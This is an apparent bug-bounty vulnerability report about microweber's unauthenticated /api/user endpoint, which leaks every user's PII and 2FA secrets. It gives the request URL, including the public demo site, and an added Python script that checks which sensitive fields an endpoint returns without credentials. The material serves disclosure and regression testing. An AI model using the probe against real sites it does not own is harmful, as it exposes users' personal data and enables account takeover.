Unauthenticated Access to Users PII in microweber/microweber
Valid
Reported on Mar 21st 2023
Description
An unauthenticated attacker can retrieve the PII of every registered user, with no credentials or session required.
The leaked fields include: first name, last name, email, username, IP address, two_factor_secret and two_factor_recovery_codes. The last two are the accounts' second-factor credentials themselves, so an attacker who reads them can also satisfy the 2FA challenge for those accounts.
Proof of Concept
Send an unauthenticated GET request to the user API endpoint of a microweber instance:
http://localhost/api/user
The response lists the details of all users.
The same request works against the public demo site:
https://demo.microweber.org/demo/api/user
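The check below, written for this page as an added example (it is not code from the report or from the microweber project), requests an endpoint with no cookies or Authorization header and reports which of the sensitive fields named above come back populated, and in how many records. The report shows only the URL, not the response body, so the script assumes the endpoint returns JSON and walks any JSON shape rather than relying on a particular layout; the key names `ip_address`, `ip`, `password` and `remember_token`, and the embedded sample response, are constructed for the example.

```python
"""Check whether an API endpoint returns user PII to an unauthenticated client.

Added example for this page; not part of the huntr report or of microweber.
Assumption: the endpoint answers with JSON. The scanner walks objects and
arrays recursively, so the exact response layout does not matter.
"""
import json
import sys
import urllib.error
import urllib.request

# Field names listed in the report, plus a few common Laravel user-table
# columns (ip_address, ip, password, remember_token are assumptions).
SENSITIVE_FIELDS = {
    "first_name", "last_name", "email", "username", "ip_address", "ip",
    "two_factor_secret", "two_factor_recovery_codes",
    "password", "remember_token",
}

EMPTY_VALUES = (None, "", [], {})


def iter_objects(node):
    """Yield every JSON object (dict) found anywhere in the document."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from iter_objects(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_objects(item)


def populated_sensitive(obj):
    """Sensitive keys of one object whose value is actually filled in."""
    return {
        key.lower()
        for key, value in obj.items()
        if key.lower() in SENSITIVE_FIELDS and value not in EMPTY_VALUES
    }


def exposed_pii_fields(body):
    """Sorted list of sensitive field names populated anywhere in the body."""
    found = set()
    for obj in iter_objects(body):
        found |= populated_sensitive(obj)
    return sorted(found)


def exposed_record_count(body):
    """Number of objects carrying at least one populated sensitive field."""
    return sum(1 for obj in iter_objects(body) if populated_sensitive(obj))


def fetch_unauthenticated(url, timeout=10):
    """GET the URL with no credentials; return (status, parsed JSON or None)."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, raw = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, None  # 401/403 here means the endpoint is protected
    try:
        return status, json.loads(raw)
    except ValueError:
        return status, None


def check(url):
    """One-line verdict for an endpoint, suitable for a regression test."""
    status, body = fetch_unauthenticated(url)
    if body is None:
        return f"{url}: HTTP {status}, no JSON body (endpoint may be protected)"
    fields = exposed_pii_fields(body)
    if not fields:
        return f"{url}: HTTP {status}, no sensitive fields in response"
    return (f"{url}: HTTP {status}, {exposed_record_count(body)} record(s) "
            f"expose {', '.join(fields)}")


# Constructed sample response (not captured from microweber) so the checker
# can be exercised offline; the second user has no 2FA enrolled.
SAMPLE_RESPONSE = [
    {"id": 1, "username": "admin", "first_name": "Ada", "last_name": "Lovelace",
     "email": "ada@example.com", "two_factor_secret": "JBSWY3DPEHPK3PXP",
     "two_factor_recovery_codes": ["a1b2-c3d4"], "created_at": "2023-01-01"},
    {"id": 2, "username": "guest", "first_name": "", "last_name": None,
     "email": "guest@example.com", "two_factor_secret": None,
     "two_factor_recovery_codes": None},
]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check(sys.argv[1]))
    else:
        print(exposed_record_count(SAMPLE_RESPONSE), exposed_pii_fields(SAMPLE_RESPONSE))
```

Run it as `python check_user_api.py http://localhost/api/user` against an instance you are testing; after the endpoint has been fixed the script should report an HTTP 401 or 403 with no JSON body, or a body in which none of the sensitive fields are populated.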
Impact
An unauthenticated attacker can enumerate every user account and harvest the PII listed above, including the two-factor secrets and recovery codes needed to defeat 2FA on those accounts.
We are processing your report and will contact the microweber team within 24 hours.
We have contacted a member of the microweber team and are waiting to hear back.
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
Peter Ivanov has been awarded the fix bounty.
This vulnerability has been assigned a CVE.
This vulnerability is scheduled to go public on Apr 22nd 2023.